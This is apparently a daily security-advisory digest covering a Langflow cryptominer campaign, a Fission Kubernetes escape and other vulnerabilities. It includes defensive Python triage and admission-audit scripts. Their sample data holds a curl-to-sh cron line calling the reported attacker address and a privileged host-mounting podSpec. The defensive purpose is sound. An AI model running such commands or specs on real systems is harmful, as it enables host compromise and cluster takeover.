Langflow RCE exploitation deploys Monero miner on exposed AI endpoints
Classification: NEW. Newly promoted in today's intelligence. Supported response: owner routing, exposure review, and fixed-version validation where the source names a patch or mitigation. Current exploitation reporting comes from The Hacker News and Trend Micro.
Recommended action: Treat every exposed Langflow instance as incident-response scope; hunt for the address 83.142.209[.]214, the lambsys and XMRig artefacts, cron-based persistence, and SSH-key propagation to other hosts.
Identifiers: CVE-2026-33017
Sources: [The Hacker News report](https://thehackernews.com/2026/06/langflow-rce-exploited-to-deploy-monero.html)
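A minimal triage scan for the indicators listed above, added here as an example and not taken from The Hacker News or Trend Micro reporting. It refangs the defanged address, matches the named artefacts case-insensitively across collected host artefacts, flags download-and-execute cron entries and unknown authorized_keys entries, and runs against constructed sample lines; the approved-key baseline and the artefact layout are assumptions.

```python
"""Added triage example (not code from the source reporting): scan collected
host artefacts for the Langflow-miner indicators named in the digest.
All sample lines and the key baseline below are constructed."""
from __future__ import annotations

import re

# The report gives the address defanged; refang it for matching.
C2_IP = "83.142.209[.]214".replace("[.]", ".")
# Guard both ends so 183.142.209.214 or 83.142.209.2140 do not match.
IP_RE = re.compile(r"(?<![\d.])" + re.escape(C2_IP) + r"(?![\d.])")
# Names the report lists as hunt terms (matched case-insensitively).
NAME_INDICATORS = ("lambsys", "xmrig")
# Generic download-and-execute cron shape; not a literal command from the report.
CRON_FETCH_RE = re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b")

# Assumed baseline of approved public-key blobs for this host.
KNOWN_KEYS = {"AAAAC3NzaC1lZDI1NTE5AAAAIExampleAdminKey"}

# Constructed sample artefacts, keyed by the collection source.
SAMPLE = {
    "crontab": [
        "0 */6 * * * /usr/bin/certbot renew --quiet",
        "*/5 * * * * curl -s http://83.142.209.214/x.sh | sh",
        "@reboot /tmp/.lambsys >/dev/null 2>&1",
    ],
    "ps": [
        "root 1 0.0 0.1 /sbin/init",
        "langflow 4242 97.3 2.1 /tmp/.lambsys",
        "langflow 4301 99.0 3.0 /var/tmp/xmrig -o pool.example:3333",
    ],
    "authorized_keys": [
        "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleAdminKey admin@bastion",
        "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQExampleUnknownKey root@langflow-host",
    ],
    "netstat": [
        "tcp 0 0 10.0.0.5:7860 10.0.0.9:51234 ESTABLISHED 1200/python",
        "tcp 0 0 10.0.0.5:49822 83.142.209.214:80 ESTABLISHED 4242/.lambsys",
    ],
}


def scan_line(source: str, line: str, known_keys: set[str]) -> list[str]:
    """Return the reasons one artefact line is suspicious (empty if none)."""
    reasons: list[str] = []
    lowered = line.lower()
    if IP_RE.search(line):
        reasons.append("c2-ip")
    for name in NAME_INDICATORS:
        if name in lowered:
            reasons.append(f"name:{name}")
    if source == "crontab":
        if CRON_FETCH_RE.search(lowered):
            reasons.append("cron-fetch-exec")
        if lowered.startswith("@reboot"):
            reasons.append("cron-reboot")
    if source == "authorized_keys":
        # The key blob is the first token starting with "AAAA"; this also
        # handles entries prefixed with options such as command="...".
        blob = next((t for t in line.split() if t.startswith("AAAA")), None)
        if blob is not None and blob not in known_keys:
            reasons.append("unknown-ssh-key")
    return reasons


def hunt(artifacts: dict[str, list[str]], known_keys: set[str]) -> list[dict]:
    """Scan every collected line and return the findings in collection order."""
    findings = []
    for source, lines in artifacts.items():
        for line in lines:
            reasons = scan_line(source, line, known_keys)
            if reasons:
                findings.append({"source": source, "reasons": reasons, "line": line})
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE, KNOWN_KEYS):
        print(f"[{f['source']}] {', '.join(f['reasons'])}: {f['line']}")
```

Feed it the real crontab, process list, authorized_keys and socket output from a suspect host; every hit is a reason to preserve the host image before remediation, and an unknown key on one host is the cue to repeat the scan on every host that key could reach.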
Red Hat JBoss EAP / Undertow WID-SEC-2026-0054 advisory reaches CERT-Bund
Classification: NEW. Newly promoted in today's intelligence. Supported response: owner routing, exposure review, and fixed-version validation where the source names a patch or mitigation.
Recommended action: Route JBoss EAP and Undertow owners for fixed package validation.
Identifiers: WID-SEC-2026-0054 / CVE-2024-3884 / CVE-2025-12543 / CVE-2025-9784
Sources: [CERT-Bund WID-SEC-2026-0054](https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-0054)
OFFIS DCMTK Toolkit path traversal affects healthcare imaging workflows
Classification: NEW. Newly promoted in today's intelligence. Supported response: owner routing, exposure review, and fixed-version validation where the source names a patch or mitigation.
Recommended action: Patch DCMTK and review C-GET storage mode in healthcare imaging workflows.
Identifiers: CVE-2026-50003
Sources: [CISA medical advisory](https://www.cisa.gov/news-events/ics-medical-advisories/icsma-26-181-01)
Fission podSpec injection enables Kubernetes node escape and cluster takeover
Classification: NEW. Newly promoted in today's intelligence. Supported response: owner routing, exposure review, and fixed-version validation where the source names a patch or mitigation.
Recommended action: Update Fission to v1.24.0 and validate admission controls for privileged podSpec fields.
Identifiers: CVE-2026-50545 / CVE-2026-50563
Sources: [Fission release notes](https://github.com/fission/fission/releases/tag/v1.24.0); [GitHub advisory GHSA-wmgg-3p4h-48x7](https://github.com/advisories/GHSA-wmgg-3p4h-48x7); [GitHub advisory GHSA-v455-mv2v-5g92](https://github.com/advisories/GHSA-v455-mv2v-5g92)
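The admission check that the recommended action asks owners to validate, written out as an added example rather than code from the Fission project: an audit of the core/v1 PodSpec fields that turn a pod into a node escape (host namespaces, hostPath mounts, privileged containers, privilege escalation, dangerous added capabilities). The sample specs are constructed, and because this page does not describe how Fission maps a user-supplied podSpec onto its runtime pods, the function takes a bare PodSpec dict.

```python
"""Added example (not Fission project code): audit a core/v1 PodSpec for the
fields an admission control must reject to prevent node escape.
Both sample specs below are constructed."""
from __future__ import annotations

HOST_NAMESPACE_FIELDS = ("hostPID", "hostNetwork", "hostIPC")
# Capabilities that alone or combined give host-level control.
DANGEROUS_CAPS = {
    "ALL", "SYS_ADMIN", "SYS_PTRACE", "SYS_MODULE", "SYS_RAWIO",
    "NET_ADMIN", "DAC_READ_SEARCH", "BPF",
}
CONTAINER_LISTS = ("initContainers", "containers", "ephemeralContainers")


def audit_podspec(spec: dict) -> list[str]:
    """Return policy violations in schema order; an empty list means admissible."""
    violations: list[str] = []
    for field in HOST_NAMESPACE_FIELDS:
        if spec.get(field):
            violations.append(f"spec.{field}=true")
    for vol in spec.get("volumes") or []:
        if "hostPath" in vol:
            path = (vol.get("hostPath") or {}).get("path")
            violations.append(f"volume {vol.get('name')!r} mounts hostPath {path}")
    for field in CONTAINER_LISTS:
        for c in spec.get(field) or []:
            name = f"{field}/{c.get('name')}"
            sc = c.get("securityContext") or {}
            if sc.get("privileged"):
                violations.append(f"{name}: privileged=true")
            # Restricted policy requires an explicit false, so unset is a violation.
            if sc.get("allowPrivilegeEscalation") is not False:
                violations.append(f"{name}: allowPrivilegeEscalation not set to false")
            added = set((sc.get("capabilities") or {}).get("add") or [])
            bad = sorted(added & DANGEROUS_CAPS)
            if bad:
                violations.append(f"{name}: adds capabilities {bad}")
    return violations


# Constructed: a runtime pod that stays inside the restricted profile.
SAFE_SPEC = {
    "containers": [{
        "name": "runtime",
        "image": "example.invalid/runtime:1.0",
        "securityContext": {
            "runAsNonRoot": True,
            "allowPrivilegeEscalation": False,
            "capabilities": {"drop": ["ALL"]},
        },
        "volumeMounts": [{"name": "scratch", "mountPath": "/tmp"}],
    }],
    "volumes": [{"name": "scratch", "emptyDir": {}}],
}

# Constructed: the shape of a podSpec injected for a node escape.
ESCAPE_SPEC = {
    "hostPID": True,
    "volumes": [{"name": "host-root", "hostPath": {"path": "/"}}],
    "containers": [{
        "name": "runtime",
        "image": "example.invalid/runtime:1.0",
        "securityContext": {
            "privileged": True,
            "capabilities": {"add": ["SYS_ADMIN", "NET_BIND_SERVICE"]},
        },
        "volumeMounts": [{"name": "host-root", "mountPath": "/host"}],
    }],
}


if __name__ == "__main__":
    for label, spec in (("safe", SAFE_SPEC), ("escape", ESCAPE_SPEC)):
        print(label, audit_podspec(spec) or "admissible")
```

Run the same checks as a ValidatingAdmissionPolicy or a policy-engine rule on the namespace where Fission creates runtime pods; the upgrade to v1.24.0 closes the injection path, while the admission layer is what stops the next path from reaching the node.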
StoneFly Storage Concentrator exposes unauthenticated root command execution
Classification: NEW. Newly promoted in today's intelligence. Supported response: owner routing, exposure review, and fixed-version validation where the source names a patch or mitigation.
Recommended action: Patch or isolate Storage Concentrator / SCVM versions below fixed 8.0.4.x builds.
Identifiers: CVE-2026-56415 / CVE-2026-56413 / CVE-2026-50110
Sources: [CISA ICS advisory](https://www.cisa.gov/news-events/ics-advisories/icsa-26-181-06)
Progress Kemp LoadMaster CVE-2026-8037 patch-release item re-promoted by sidecar
Classification: UPDATED(patch_released). Today's delta is that a patch has been released. Treat this as a material update to an ongoing story, not as a new technical class.
Identifiers: CVE-2026-8037
Sources: [The Hacker News report](https://thehackernews.com/2026/06/progress-kemp-loadmaster-flaw-could-let.html)
CVE-2026-8631 HPLIP arbitrary-code-execution fixes land in Ubuntu
Classification: NEW. Newly promoted in today's intelligence. Supported response: owner routing, exposure review, and fixed-version validation where the source names a patch or mitigation.
Recommended action: Update HPLIP packages where Linux endpoints or servers process untrusted print/document inputs.
Identifiers: CVE-2026-8631 / CVE-2026-8632 / USN-8483-1
Sources: [Ubuntu security notice](https://ubuntu.com/security/notices/USN-8483-1)
Angular CVE-2025-66412 high-severity XSS update reaches CERT-Bund
Classification: NEW. Newly promoted in today's intelligence. Supported response: owner routing, exposure review, and fixed-version validation where the source names a patch or mitigation.
Recommended action: Route Angular application owners to confirm deployed versions against the advisory's fixed-version mapping.
Identifiers: CVE-2025-66412 / WID-SEC-2025-2708 / GHSA-V4HV-RGFQ-GP49
Sources: [CERT-Bund WID-SEC-2025-2708](https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2025-2708)
Frangoteam FUXA SCADA/HMI dot-segment bypass exposes users and roles
Classification: NEW. Newly promoted in today's intelligence. Supported response: owner routing, exposure review, and fixed-version validation where the source names a patch or mitigation.
Recommended action: Patch FUXA <=1.3.1 and restrict unauthenticated API paths.
Identifiers: CVE-2026-13207
Sources: [CISA ICS advisory](https://www.cisa.gov/news-events/ics-advisories/icsa-26-181-02)
AdonisJS bodyparser CVE-2026-48795 incomplete fix
Classification: NEW. Newly promoted in today's intelligence. Supported response: owner routing, exposure review, and fixed-version validation where the source names a patch or mitigation.
Recommended action: Upgrade @adonisjs/bodyparser to 10.1.5 or 11.0.3 where multipart uploads are accepted.
Identifiers: CVE-2026-48795 / GHSA-qcm7-3vpr-hj5h
Sources: [GitHub advisory GHSA-qcm7-3vpr-hj5h](https://github.com/advisories/GHSA-qcm7-3vpr-hj5h); [AdonisJS bodyparser release notes](https://github.com/adonisjs/bodyparser/releases/tag/v10.1.5); [AdonisJS bodyparser release notes](https://github.com/adonisjs/bodyparser/releases/tag/v11.0.3)
Also tracked
- CVE-2026-49432 Apache ActiveMQ reaches BSI broker-owner routing · CVE-2026-49432 · High
- CVE-2026-49451 Microsoft.OpenAPI parser termination patched · CVE-2026-49451 · High
- Sigstore Fulcio OIDC redirect handling can leak Kubernetes service-account tokens · CVE-2026-49478 · High
- NCSC-NL routes Citrix NetScaler ADC/Gateway · CVE-2026-8451 · High
- GNU gzip CVE-2026-41991 and CVE-2026-41992 reach MSRC · CVE-2026-41991 · Medium
- Apple WebKit/iOS/macOS/Safari CVE-2026-43707 patch batch · CVE-2026-43707 · Medium
- Sigstore Timestamp Authority unauthenticated requests can exhaust memory · CVE-2026-49835 · Medium
- CVE-2026-50229 Apache Tomcat reaches BSI and CERT-FR routing · CVE-2026-50229 · Medium
- MSRC libxml2 CVE-2026-11979 stack-based buffer overflow · CVE-2026-11979 · Low
- CVE-2026-52747 OWASP ModSecurity bypass reaches BSI high queue · CVE-2026-52747 · Unknown
- WID-SEC-2026-2136 Icinga high-severity multi-vulnerability advisory
- WID-SEC-2026-2132 NATS Server high-severity multi-vulnerability advisory
- WID-SEC-2026-2133 OpenClaw high-severity multi-vulnerability advisory
- Phantom squatting uses AI-hallucinated domains as a software supply-chain vector
- Bash parser tricks expand AI coding-agent supply-chain concern
- Nissan discloses employee data breach linked to Oracle zero-day attacks
- PeopleSoft/ShinyHunters campaign adds Nissan and NAIC named victims
- Polymarket frontend supply-chain incident reaches Check Point reporting
- Weekly recap patch/remediation sidecar item remains low-actionability